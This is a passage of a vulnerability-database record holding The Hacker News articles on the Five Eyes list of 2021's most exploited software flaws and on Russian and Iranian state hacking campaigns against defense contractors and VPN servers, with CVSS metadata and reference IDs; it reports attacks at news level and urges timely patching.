DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2022-04-28T05:41:00", "modified": "2022-05-09T02:55:12", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.0}, "severity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "immutableFields": [], "lastseen": "2022-05-09T03:29:54", "viewCount": 2467, "enchantments": {"score": {"value": 1.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491"]}, {"type": "canvas", "idList": ["OWA_RCE"]}, {"type": "cert", "idList": ["VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1187", "CPAI-2019-1097", "CPAI-2020-0104"]}, {"type": "cisa", "idList": ["CISA:18E5825084F7681AD375ACB5B1270280", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C"]}, {"type": "cve", "idList": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:48153", "EDB-ID:48168"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "059DC199-E425-50EE-B5F5-E351E0323E69", "31DB22CD-3492-524F-9D26-035FC1086A71", "39732E15-7AF0-5FC2-851B-B63466C0F2F2", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "796841FC-B75D-5F42-B0E7-7FF15A74E5C1", "8C937DCD-4090-5A44-9361-4D9ECF545843", "A7CA20BB-BCF9-52C0-A708-01F9ADECB1AC", "AAC2853C-A655-5E80-9262-A654102B874A", "AC9BE6BA-8352-57D6-80E3-8BB62A0D31C2", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BE2B1B45-11AE-56F2-A5B4-2497BAE3B016", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "DC044D23-6D59-5326-AB78-94633F024A74", "F1CA855B-967C-5A5E-9256-FDDE87702713"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:591295", "H1:671749", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:1825C4046C6054693C41D7D5DFD7BA10", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11664"]}, {"type": "kitploit", "idList": ["KITPLOIT:119877528847056004", "KITPLOIT:1244156083583318186", "KITPLOIT:2686676167278919598", "KITPLOIT:2722328714476257207", "KITPLOIT:3532211766929466258", "KITPLOIT:4421457840699592233", "KITPLOIT:4425790137948714912", "KITPLOIT:4707889613618662864", "KITPLOIT:5376485594298165648", "KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:5829195600312197311", "KITPLOIT:6516544912632048506", "KITPLOIT:7070039119688478663", "KITPLOIT:763105754466120590", "KITPLOIT:816704453339226193", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:95DEE0244F6DE332977BB606555E5A3C", "KREBS:9D9C58DB5C5495B10D2EBDB92549B0F2", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:5899EF0CF34937AFA2DB4AB02D282DF6", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_ECP_VIEWSTATE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0688", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4536987", "KB4536988", "KB4536989"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["701277.PRM", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "SMB_NT_MS20_FEB_EXCHANGE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:154176", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:158056"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "securelist", "idList": ["SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:C50F1C7ECAFB8BD5FDEDAA29493B81A6", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F05591B26EFD622E6C72E180A7A47154"]}, {"type": "talosblog", "idList": ["TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:8483C1B45A5D7BF5D501DE72F5898935", "THN:8BA951AD00E17C72D6321234DBF80D19", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9B536B531E6948881A29BEC793495D1E", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EAEDDF531EB90375B350E1580DE3DD02", "THN:F25FAD25E15EBBE4934883ABF480294D", "THN:F35E41E26872B23A7F620C6D8F7E2334", "THN:FBDAEC0555EDC3089DC0966D121E0BCE", "THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "THREATPOST:3CC83DBBAFE2642F4E6D533DDC400BF6", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8A56F3FFA956FB0BB2BB4CE451C3532C", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20"]}, {"type": "zdi", "idList": ["ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-33133", "1337DAY-ID-33134", "1337DAY-ID-33140", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34553"]}]}, "vulnersScore": 1.7}, "_state": {"score": 1659990670, "dependencies": 1659994789}, "_internal": {"score_hash": "72a013e7cdc2787f295cedae5209c5cd"}}

{"thn": [{"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgfHxH3Dt4VXRfmdH7Z5AIzdTH11h4caDd4ap4XoxMEluunQIHIKcMfsOmGXHYfBm80iV7yauBv6comuqDI53yYZ-scRdempbDZFRKoVre0dwv8XB-HY7OuqI3zugrjX_AU4O94F-ikvT5ttBGEc9cGB3wRTB1Tkpo2jFZZ5dobK0ftUAK2GlxVr_sa>)\n\nState-sponsored actors backed by the Russian government regularly targeted the networks of several U.S. cleared defense contractors (CDCs) to acquire proprietary documents and other confidential information pertaining to the country's defense and intelligence programs and capabilities.\n\nThe sustained espionage campaign is said to have commenced at least two years ago from January 2020, according to a [joint advisory](<https://www.cisa.gov/news/2022/02/16/new-cybersecurity-advisory-protecting-cleared-defense-contractor-networks-against>) published by the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA).\n\n\"These continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>). \"The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology.\"\n\nCompromised entities include contractors that dabble in command, control, communications, and combat systems; surveillance and reconnaissance; weapons and missile development; vehicle and aircraft design; and software development, data analytics, and logistics.\n\nThe threat actors rely on \"common but effective\" tactics to breach target networks such as spear-phishing, credential harvesting, brute-force attacks, password spray techniques, and exploitation of known vulnerabilities in VPN devices, before moving laterally to establish persistence and exfiltrate data.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEj72CV_TZddW8ZEFbbWJoksQeXFXLFFSgoy22sgxewm7OT-W5YDgBIqLdOhdUK4p3Z5AV32z7EtFYvCInbCCdVzX37Wzqx1TL_G6NeQuEKUOLVC6371dcORdcP2owx3pnjKJyUaGJCQ56o-mLZcUzXswT3hUvEKbXxZBzEmEt8nYAClgNN9xU4V4anK>)\n\nSome of the [vulnerabilities](<https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html>) leveraged by the attackers for initial access and privilege escalation are as follows \u2013\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) \u2013 FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) \u2013 Microsoft Exchange validation key remote code execution vulnerability\n * [**CVE-2020-17144**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17144>) (CVSS score: 8.4) \u2013 Microsoft Exchange remote code execution vulnerability\n\nMany of the intrusions also involve gaining a foothold to enterprise and cloud networks, with the adversaries maintaining persistent access to the compromised Microsoft 365 environments for as long as six months to repeatedly harvest emails and data.\n\n\"As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access,\" the agencies explained. \"This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\"\n\nAmong other malicious activities observed is the routine use of virtual private servers (VPSs) as an encrypted proxy and the use of legitimate credentials to exfiltrate emails from the victim's enterprise email system. The advisory, however, does not single out any Russian state actor by name.\n\n\"Over the last several years, Russian state-sponsored cyber actors have been persistent in targeting U.S. cleared defense contractors to get at sensitive information,\" [said](<https://www.nsa.gov/Press-Room/News-Highlights/Article/Article/2935170/nsa-fbi-cisa-release-advisory-on-protecting-cleared-defense-contractor-networks/>) Rob Joyce, director of NSA Cybersecurity. \"Armed with insights like these, we can better detect and defend important assets together.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-17T05:42:00", "type": "thn", "title": "U.S. Says Russian Hackers Stealing Sensitive Data from Defense Contractors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-17T13:01:50", "id": "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "href": "https://thehackernews.com/2022/02/us-says-russian-hackers-stealing.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 